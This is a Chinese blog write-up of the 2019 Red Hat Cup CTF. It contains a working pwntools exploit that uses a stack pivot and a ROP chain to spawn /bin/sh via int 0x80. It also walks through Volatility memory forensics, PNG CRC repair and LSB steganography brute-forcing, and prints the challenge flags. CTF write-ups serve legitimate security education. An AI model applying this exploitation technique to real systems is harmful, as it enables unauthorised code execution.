2019年第三届红帽杯线上赛wp

最新推荐文章于 2022-06-27 10:37:12 发布
最新推荐文章于 2022-06-27 10:37:12 发布
阅读量1.5k 收藏 5
点赞数
文章标签: 红帽杯 write up 内存取证 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/103094477
版权

2019年第三届红帽杯线上赛wp

PWN

three

IDA打开之后,函数名都是sub_xxx,然后通过nc官方部署的程序(或本地在程序所在目录创建flag文件后),获得程序中会出现的字符串定位到了重要函数,我用的是字符串Maybe is good

贴出来一下重要函数对应的内存地址:

函数名(已重命名)内存地址
main0x08048CA8
load_flag0x080488C5
Maybe_is_good0x0804897E
main_method0x08048B5C

四者结构如图:

四者结构

load_flag里面需要加载flag文件,如果没有就exit,也就是一开始无法本地打开原因。

Maybe_is_good 里面没有特别的,关键在main_method,先贴出完整代码(以重名部分函数&注释)

gdb调试:‘very much’ 后输入 ‘aaa’,‘tell me’ 后输入 ‘bbbbbbbbbbb······’。可以看到eax被写入了’aaa’,ecx被写入了’bbbbbbbbbbbbbbbbbbb····’

然后就是第22行代码,看不懂就查汇编,对应的汇编是call eax。就是当eax是函数来调用。结合前面的eax会被覆写为输入值,就可以进行ROP

攻击大致流程如下:

  1. eax被覆写为payload1
  2. 写入payload2
  3. call eax
  4. int80_call
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *


context.log_level = 'debug'
elf = ELF('./pwn')
# 'ldd ./pwn' get libc.so
# libc = ELF('./libc-2.27.so')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

sh = process('./pwn')
sh.sendlineafter('index:\n', str(0)) # 0<=x<=31

payload = asm('''
xchg ecx, esp
ret
''',arch = 'i386')
sh.sendafter(' much!\n', payload)

sh.sendlineafter('size:\n', str(512)) # 0<=x<=512,x>payload

# ROPgadget
layout = [
    0x08072fb1, #: pop edx; pop ecx; pop ebx; ret; 
    0,
    0,
    0x80f6d40, # '/bin/sh\0' address
    0x080c11e6, #: pop eax; ret; 
    11, # len '/bin/sh\0'
    0x080738c0, #: int 0x80; ret; 
]
sh.sendafter('me:\n', flat(layout).ljust(0x80, '\0') + '/bin/sh\0')

sh.interactive()

EXP解释

  • 13、21行两个数值可在注释范围内调整
  • payload是交换ecx、esp两个寄存器的值
  • layout里面是gadget,向int_80传参
  • int_80的作用类似于system,具体看这里
    • https://blog.csdn.net/fivedoumi/article/details/53184797
    • https://blog.csdn.net/maowenl/article/details/32309683
    • https://www.cnblogs.com/caesarxu/p/3261232.html

最后:官方wp解法是交换ecx、esp的内容之后,利用返回值是1还是2,来逐个字节爆破得出flag。

Mics

Advertising for Marriage

内存取证题目。题目给出的是raw文件,这个文件不是图片的那个raw。。。初次之外内存取证还有dmg文件。利用的分析工具最主要是volatility

首先查看镜像信息:volatility -f Advertising\ for\ Marriage.raw imageinfo

使用 WinXPSP2x86 预设。然后就是查进程:volatility -f Advertising\ for\ Marriage.raw --profile=WinXPSP2x86 pslist

存在记事本进程,查一查有什么:volatility -f Advertising\ for\ Marriage.raw --profile=WinXPSP2x86 notepad

提示:hint:????needmoneyandgirlfirend

扫描所有png文件:volatility -f Advertising\ for\ Marriage.raw --profile=WinXPSP2x86 filescan|grep png

找到一张 png 图片:vegetable.png。导出图片:volatility -f Advertising\ for\ Marriage.raw --profile=WinXPSP2x86 dumpfiles -D . -Q 0x000000000249ae78

图片无法显示,报错:IHDR: CRC ERROR

估计图片尺寸被修改了。

用脚本计算图片实际长度和宽度,并且生成修复后的图片。

import os
import binascii
import struct

img = open("vegetable.png", "rb").read()

for w in range(1024):
    for h in range(1024):
        data = img[0xc:0x10] + struct.pack('>i',w) + struct.pack('>i',h) + img[0x18:0x1d]
        crc32 = binascii.crc32(data) & 0xffffffff
        if crc32 == struct.unpack('>i',img[0x1d:0x21])[0] & 0xffffffff:
            print w, h
            print hex(w), hex(h)
            open("vegetable_new.png", "wb").write(img[:0xc] + data + img[0x1d:])
            exit()

Stegsolve 查看图片,找到模糊的 flag,一般情况较难恢复。同时,也发现 lsb 有点东西。

解密需要密钥,密钥为上面记事本找到的提示:????needmoneyandgirlfirend,需要魔改工具爆破前 4 字节。

爆破得到密钥 b1cxneedmoneyandgirlfirend,这里给出自己写的破解脚本,需要把lsb加密库clone 下载,然后把脚本丢里面运行

#coding:utf-8
import os
import string

# creat password
password = []
pd_element =  list(string.ascii_letters) + list(string.digits)
for i in pd_element:
	if i != 'b':
		continue
	for j in pd_element:
		#if j != '1':
			#continue
		for k in pd_element:
			for m in pd_element:
				password.append(i+j+k+m+"needmoneyandgirlfirend")
				#pd = i+j+k+m+"needmoneyandgirlfirend"
				#print "password = %s " %pd

n = 0
file_name = '2.png' # 解密的图片
out_file_1 = 'out.txt' # lsb中间文件
out_file_2 = 'result.txt' # result结果记录文件
for pd in password:
	out_data_2= open(out_file_2,'a')
	pd = 'b1cxneedmoneyandgirlfirend'
	try:
		print "total try {} times\ntrying: {}".format(n,pd)
		argv = r'python lsb.py extract ' + file_name  + ' ' + out_file_1 + ' '+ pd 
		lsb  =  os.popen(argv,'r')
		data = lsb.read()
		lsb.close()
		print "{} SUCCESS".format(pd)
		out_data_1 = open(out_file_1,'r')
		data = out_data_1.read().strip('\n')
		out_data_2.write(data+'\n')
		n += 1
		break
	except:
		print "{} ERROR".format(pd)
		n += 1
	out_data_2.close()

解密图片隐写信息,得到字符串:VmlyZ2luaWEgY2lwaGVydGV4dDpnbnh0bXdnN3IxNDE3cHNlZGJzNjI1ODdoMA==

base64 解码得到:Virginia ciphertext:gnxtmwg7r1417psedbs62587h0

然后再使用在线维吉尼亚密码解密:密钥b1cxneedmoneyandgirlfirend

解密得到: flagisd7f1417bfafbf62587e0

SkYe231_
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红帽杯2019 Easyre wp
xia0ji233
05-17 388
title: WP:红帽杯2019 easyRe date: 2021-05-6 1:24:00 tags: writeup binary security reverse analysis comments: true categories: ctf reverse pwn题做完re题当然也不能少,buu上除了那些水题,开始做一些带点技术含量的题目了。红帽杯2019的easyRE上来就是800KB的elf文件,看起来就很有技术含量的样子。其实看到大文件不用怕,函数多也不用怕,因为需要分析的函数一定.
红帽杯three
NoOneGroup
01-08 293
title: 红帽杯three tags: pwn 二进制 writeup 红帽杯 2019 categories: writeup abbrlink: 633c637e date: 2019-11-15 17:24:38 新博客链接 three 这道题我开始用了jmp ecx。。可能基础没打好吧,让我真正理解nx保护的就是这道了,为什么rop能绕过nx保护,因为rop利用的是ret一个地...
buu [2019红帽杯]xx1 wp
zzqzzq11的博客
01-13 499
首先用exeinfo打开它,发现是无壳的64位程序。 逆向先静后动,因此先用ida 打开: main函数代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { unsigned __int64 v3; // rbx __int64 v4; // rax __int128 *v5; // rax __int64 v6; // r11 __int128 *v7; // r14 int..
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
第18天:红帽杯2019-childRE
S1lenc3的博客
11-17 691
继续复现红帽杯逆向题。 程序流程: 输入并且检测长度,可以看到长度是31。 这是一组变换函数,搞了好长时间才弄懂。 对v2进行反修饰,得出的结果存入outputString,outputString长度为62. 取outputString的字符串进行除和取余,并且作为a1234567890Qwer的索引,对指定索引进行明文比较。 这就是正确的程序流程。 解题思路: ...
第四届红帽杯网络安全大赛-线上Writeup1
08-03
第四届红帽杯络安全赛-线上Writeup 第四届红帽杯络安全赛 - 线上Writeup 第四届红帽杯络安全赛-线上Writeup 第四届红帽杯络安全赛-
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
第三届红帽杯”网络安全攻防大赛总决赛落幕.pdf
09-20
第三届红帽杯”网络安全攻防大赛总决赛落幕.pdf
第三届红帽杯线上初赛Misc题之Advertising for Marriage
mid2dog
11-13 1802
除校赛外初次参加ctf比赛…我好菜orz 不过还是很开心体验了回生活,收获了个中二狗和荷兰猪的双人战队哈哈哈 好了,来讲讲这道征婚题目吧,真的哭了出来,明明就差一点… 对了,想做这道题的可以去守夜人ctf平台,网址如下http://ctf.heikanet.com/ 首先看下载过来的文档格式,发现是raw,然后百度了下发现是拍照格式,下载了acdsee发现打不开 于是我用linux虚拟机binw...
2018红帽杯线上预选赛wp---Web
wkend的博客
05-05 596
1. simple upload 首先使用弱口令登录试试,页面没啥变化,设置代理,Burp Suite抓包 发现cookieadmin=0,将其值改为1,跳转到新页面, 编辑php一句话,保存为jpg图片上传, 在Burp Suite中修改文件名为1.php, 可以上传,但是发现并不解析 尝试了asp,aspx,jsp,发现jsp可以执行,重新上传jsp即...
2018红帽杯icm WP
BadRer的博客
05-02 387
前言这题基本上就考察一个idea算法。简单分析一下程序,可以知道flag长度为42。显示使用idea进行加密,然后hex->逆序->异或过程这题的难点还是在idea算法的解密上。刚开始也不知道是什么加密方式。 无独有偶,看到了这个奇怪的字符串。然后百度了一下,发现是idea算法。但是有关这个算法的相关的资料很少,只找到了c的源程序,自己编译了一下,刚开始尝试发现找不到密匙,不对,于是IDA打开,进
buu [2019红帽杯]Snake wp
liuxiaohuai_的博客
12-23 657
不得不说这个游戏做的还是蛮精致的,我就这么玩玩了我半个小时。 该游戏是用unity编写的,那么在文件中找到Assembly-CSharp.dll(\Snake\Snake_Data\Manage\Assembly-CSharp.dll这个路径)拖进dnspy就能对该游戏框架的反汇编了。 我们把它拖入ida中,就可以很清楚的看到文件中的函数调用情况 而这个GameObject函数就是这个游戏的主函数。再回到dnspy中,找到Interface下的GameObject函数 在游戏文件中找到interface
2019 红帽杯 three 经验总结
qq_43189757的博客
11-11 1376
这题感觉要对汇编语言要比较熟悉会更容易做出来… 程序逻辑分析: 前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中 在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag 利用思路: 通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面...
iOS Hook在IDA中显示为sub_xxx的函数
glt_code的博客
10-26 7551
基础 1. Mach-O文件组成部分 Header、Load commands、Raw segment date(常见的一些段__PAGEZERO空指针陷阱段、_TEXT程序代码段、__DATA程序数据段、__LINKEDIT:链接器使用段等); 2. Mach-O文件的加载 dyld Mach-O文件被dyld进行加载的;dyld(the dynamic link editor)是 Ap...
【BUUCTF逆向 [2019红帽杯]xx】
chuxuezhewocao的博客
06-27 574
BUUCTF刷题记录,本题主要是一道C++程序题,主要在于理清代码逻辑,c++的反汇编伪代码看的还不是很熟练。代码稍长,可以分段看,首先来到第一段,是一个获取输入的部分: 这里有一个容易看错的地方,就是存储输入的那个变量叫Code,然后v6指向的内容也叫Code,但是这两个不是一个东西,后者跟进去后可以看到如图上标注所示 这里是最后一个异或的逻辑,相当于从v20[3]开始,每一位都会和前面的几个数据循环异或,范围就是range(i//3),逆的时候从后往前算 总体的逻辑差不多是这样,但是在解的时候卡在了解
IDA 显示函数名称技巧
Safedebug的博客
12-01 7023
在IDA中,我们可以经常看到这种   all memset push esi ; unsigned int call ??_U@YAPAXI@Z ; operator new[](uint) push esi ; Size push 0 ; Val push eax
面向萌新的红帽杯2018线上wp
xiaoi123的博客
05-03 1865
网络安全攻防大赛第二届“红帽杯”网络安全攻防大赛(除了web3 guess id,不会做。没写。)misc2 Not Only Wireshark下载流量包,wireshark打开,过滤查看http发现name可疑,用python re全部提取出来504B0304,zip文件头了解一下得到2.zip,打开发现需要密码然后在流量包中ctrl+f搜索pass、pw、word、key,发现key有东西使...
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9951
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
虚拟机红帽Linux安装
最新发布
10-08
虚拟机中安装红帽Linux可以按照以下步骤进行操作: 1. 首先,确保你已经安装了虚拟机软件,比如VMware Workstation或者Oracle VirtualBox。 2. 下载红帽Linux的ISO镜像文件,可以从红帽官网下载或者其他可信的来源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值